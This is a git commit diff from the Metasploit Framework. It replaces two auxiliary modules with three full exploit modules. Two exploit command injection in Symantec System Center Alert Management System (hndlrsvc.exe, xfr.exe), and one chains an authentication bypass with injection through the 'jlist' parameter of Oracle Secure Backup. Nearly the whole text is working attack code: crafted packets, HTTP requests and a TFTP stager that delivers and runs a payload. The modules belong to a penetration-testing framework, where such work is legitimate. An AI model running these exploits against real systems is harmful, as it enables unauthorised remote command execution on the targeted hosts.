working on moving things referenced in Feature #653. added different param for secure backup
git-svn-id: file:///home/svn/framework3/trunk@13591 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
fe53151324
commit
aef764de08
|
@ -1,136 +0,0 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
|
||||
because the application fails to properly sanitize user-supplied input.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '66807'],
|
||||
[ 'BID', '41959' ],
|
||||
[ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 26 2010'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(38292),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute',
|
||||
'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
begin
|
||||
connect
|
||||
|
||||
cmd = datastore['CMD']
|
||||
|
||||
if ( cmd.length > 128 )
|
||||
raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
|
||||
end
|
||||
|
||||
string_uno = Rex::Text.rand_text_alpha_upper(11)
|
||||
string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
|
||||
|
||||
packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
|
||||
packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
packet << "\xe8\x03\x00\x00"
|
||||
packet << 'PRGXCNFG'
|
||||
packet << "\x10\x00\x00\x00"
|
||||
packet << "\x00\x00\x00\x00\x04"
|
||||
packet << 'ALHD\F'
|
||||
packet << "\x00\x00\x01\x00\x00"
|
||||
packet << "\x00\x01\x00\x0e\x00"
|
||||
packet << 'Risk Repaired'
|
||||
packet << "\x00\x25\x00"
|
||||
packet << 'Symantec Antivirus Corporate Edition'
|
||||
packet << "\x00\xf9\x1d\x13\x4a\x3f"
|
||||
packet << [string_uno.length + 1].pack('v') + string_uno
|
||||
packet << "\x00\x08\x08\x0a"
|
||||
packet << "\x00" + 'Risk Name'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x0a\x00"
|
||||
packet << 'File Path'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x11\x00"
|
||||
packet << 'Requested Action'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x0e\x00"
|
||||
packet << 'Actual Action'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x07\x00"
|
||||
packet << 'Logger'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x05\x00"
|
||||
packet << 'User'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x09\x00"
|
||||
packet << 'Hostname'
|
||||
packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
|
||||
packet << "\x00\x08\x13\x00"
|
||||
packet << 'Corrective Actions'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x00\x07\x08\x12\x00"
|
||||
packet << 'ConfigurationName'
|
||||
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
|
||||
packet << "\x00" + cmd
|
||||
packet << "\x00\x08\x0c\x00"
|
||||
packet << 'CommandLine'
|
||||
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
|
||||
packet << "\x00" + cmd
|
||||
packet << "\x00\x08\x08\x00"
|
||||
packet << 'RunArgs'
|
||||
packet << "\x00\x04\x00\x02\x00"
|
||||
packet << "\x20\x00\x03\x05\x00"
|
||||
packet << 'Mode'
|
||||
packet << "\x00\x04\x00\x02\x00\x00\x00"
|
||||
packet << "\x0a\x0d\x00"
|
||||
packet << 'FormatString'
|
||||
packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
|
||||
packet << 'ConfigurationName'
|
||||
packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
|
||||
packet << 'HandlerHost'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00" * packet.length
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(packet)
|
||||
|
||||
disconnect
|
||||
rescue ::Exception
|
||||
print_error("Error: #{$!.class} #{$!}")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,75 +0,0 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
|
||||
because the application fails to properly sanitize user-supplied input.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-1429' ],
|
||||
[ 'BID', '34671' ],
|
||||
[ 'OSVDB', '54157' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],
|
||||
[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
|
||||
],
|
||||
'DisclosureDate' => 'Apr 28 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(12174),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
begin
|
||||
connect
|
||||
|
||||
len = 2 + datastore['CMD'].length
|
||||
|
||||
data = [0x00000000].pack('V')
|
||||
data << len.chr
|
||||
data << "\x00"
|
||||
data << datastore['CMD'] + " "
|
||||
data << "\x00"
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(data)
|
||||
|
||||
res = sock.get_once
|
||||
|
||||
if (!res)
|
||||
print_error("Did not recieve data. Failed?")
|
||||
else
|
||||
print_status("Got data, execution successful!")
|
||||
end
|
||||
|
||||
disconnect
|
||||
rescue ::Exception
|
||||
print_error("Error: #{$!.class} #{$!}")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,176 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::CmdStagerTFTP
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
Symantec System Center Alert Management System is prone to a
|
||||
remote command-injection vulnerability because the application fails
|
||||
to properly sanitize user-supplied input.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '66807'],
|
||||
[ 'BID', '41959' ],
|
||||
[ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => 'true',
|
||||
'Platform' => 'win',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jul 26 2010'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(38292),
|
||||
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def windows_stager
|
||||
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.'})
|
||||
@payload_exe = payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
||||
connect
|
||||
|
||||
if ( cmd.length > 128 )
|
||||
raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
|
||||
end
|
||||
|
||||
string_uno = Rex::Text.rand_text_alpha_upper(11)
|
||||
string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
|
||||
|
||||
packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
|
||||
packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
packet << "\xe8\x03\x00\x00"
|
||||
packet << 'PRGXCNFG'
|
||||
packet << "\x10\x00\x00\x00"
|
||||
packet << "\x00\x00\x00\x00\x04"
|
||||
packet << 'ALHD\F'
|
||||
packet << "\x00\x00\x01\x00\x00"
|
||||
packet << "\x00\x01\x00\x0e\x00"
|
||||
packet << 'Risk Repaired'
|
||||
packet << "\x00\x25\x00"
|
||||
packet << 'Symantec Antivirus Corporate Edition'
|
||||
packet << "\x00\xf9\x1d\x13\x4a\x3f"
|
||||
packet << [string_uno.length + 1].pack('v') + string_uno
|
||||
packet << "\x00\x08\x08\x0a"
|
||||
packet << "\x00" + 'Risk Name'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x0a\x00"
|
||||
packet << 'File Path'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x11\x00"
|
||||
packet << 'Requested Action'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x0e\x00"
|
||||
packet << 'Actual Action'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x07\x00"
|
||||
packet << 'Logger'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x05\x00"
|
||||
packet << 'User'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x08\x09\x00"
|
||||
packet << 'Hostname'
|
||||
packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
|
||||
packet << "\x00\x08\x13\x00"
|
||||
packet << 'Corrective Actions'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00\x00\x07\x08\x12\x00"
|
||||
packet << 'ConfigurationName'
|
||||
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
|
||||
packet << "\x00" + cmd
|
||||
packet << "\x00\x08\x0c\x00"
|
||||
packet << 'CommandLine'
|
||||
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
|
||||
packet << "\x00" + cmd
|
||||
packet << "\x00\x08\x08\x00"
|
||||
packet << 'RunArgs'
|
||||
packet << "\x00\x04\x00\x02\x00"
|
||||
packet << "\x20\x00\x03\x05\x00"
|
||||
packet << 'Mode'
|
||||
packet << "\x00\x04\x00\x02\x00\x00\x00"
|
||||
packet << "\x0a\x0d\x00"
|
||||
packet << 'FormatString'
|
||||
packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
|
||||
packet << 'ConfigurationName'
|
||||
packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
|
||||
packet << 'HandlerHost'
|
||||
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
|
||||
packet << "\x00" + string_dos
|
||||
packet << "\x00" * packet.length
|
||||
|
||||
sock.put(packet)
|
||||
|
||||
select(nil,nil,nil,3)
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if not datastore['CMD'].empty?
|
||||
print_status("Executing command '#{datastore['CMD']}'")
|
||||
execute_command(datastore['CMD'])
|
||||
return
|
||||
end
|
||||
|
||||
case target['Platform']
|
||||
when 'win'
|
||||
windows_stager
|
||||
else
|
||||
raise RuntimeError, 'Target not supported.'
|
||||
end
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,117 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::CmdStagerTFTP
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
|
||||
because the application fails to properly sanitize user-supplied input.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-1429' ],
|
||||
[ 'BID', '34671' ],
|
||||
[ 'OSVDB', '54157' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],
|
||||
[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => 'true',
|
||||
'Platform' => 'win',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 28 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(12174),
|
||||
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def windows_stager
|
||||
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.'})
|
||||
@payload_exe = payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
||||
connect
|
||||
|
||||
len = 2 + cmd.length
|
||||
|
||||
data = [0x00000000].pack('V')
|
||||
data << len.chr
|
||||
data << "\x00"
|
||||
data << cmd + " "
|
||||
data << "\x00"
|
||||
|
||||
sock.put(data)
|
||||
|
||||
res = sock.get_once
|
||||
|
||||
if (!res)
|
||||
print_error("Did not recieve data. Failed?")
|
||||
else
|
||||
print_status("Got data, execution successful!")
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if not datastore['CMD'].empty?
|
||||
print_status("Executing command '#{datastore['CMD']}'")
|
||||
execute_command(datastore['CMD'])
|
||||
return
|
||||
end
|
||||
|
||||
case target['Platform']
|
||||
when 'win'
|
||||
windows_stager
|
||||
else
|
||||
raise RuntimeError, 'Target not supported.'
|
||||
end
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,132 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::CmdStagerTFTP
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability
|
||||
in login.php. In conjuction with the authentication bypass issue,
|
||||
the 'jlist' parameter in property_box.php can be used to execute
|
||||
arbitrary system commands.
|
||||
This module was tested against Oracle Secure Backup version 10.3.0.1.0
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
|
||||
[ 'CVE', '2010-0904' ],
|
||||
# the jlist vector has not been disclosed or has it?
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => 'true',
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => 'Jul 13 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def windows_stager
|
||||
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.'})
|
||||
@payload_exe = payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/login.php',
|
||||
'data' => 'attempt=1&uname=-',
|
||||
'method' => 'POST',
|
||||
}, 5)
|
||||
|
||||
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
|
||||
sessionid = res.headers['Set-Cookie'].split(';')[0]
|
||||
|
||||
data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
|
||||
|
||||
send_request_raw(
|
||||
{
|
||||
'uri' => '/property_box.php' + data,
|
||||
'cookie' => sessionid,
|
||||
'method' => 'GET',
|
||||
}, 5)
|
||||
|
||||
else
|
||||
print_error("Invalid PHPSESSION token..")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if not datastore['CMD'].empty?
|
||||
print_status("Executing command '#{datastore['CMD']}'")
|
||||
execute_command(datastore['CMD'])
|
||||
return
|
||||
end
|
||||
|
||||
case target['Platform']
|
||||
when 'win'
|
||||
windows_stager
|
||||
else
|
||||
raise RuntimeError, 'Target not supported.'
|
||||
end
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
end
|
||||
__END__
|
||||
else if (strcmp($type, "Job") == 0)
|
||||
{
|
||||
if (!is_array($objectname))
|
||||
$objectname = array();
|
||||
reset($objectname);
|
||||
while (list(,$oname) = each($objectname))
|
||||
{
|
||||
$oname = escapeshellarg($oname);
|
||||
$jlist = "$jlist $oname";
|
||||
}
|
||||
if (strlen($jlist) > 0)
|
||||
$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
|
Loading…
Reference in New Issue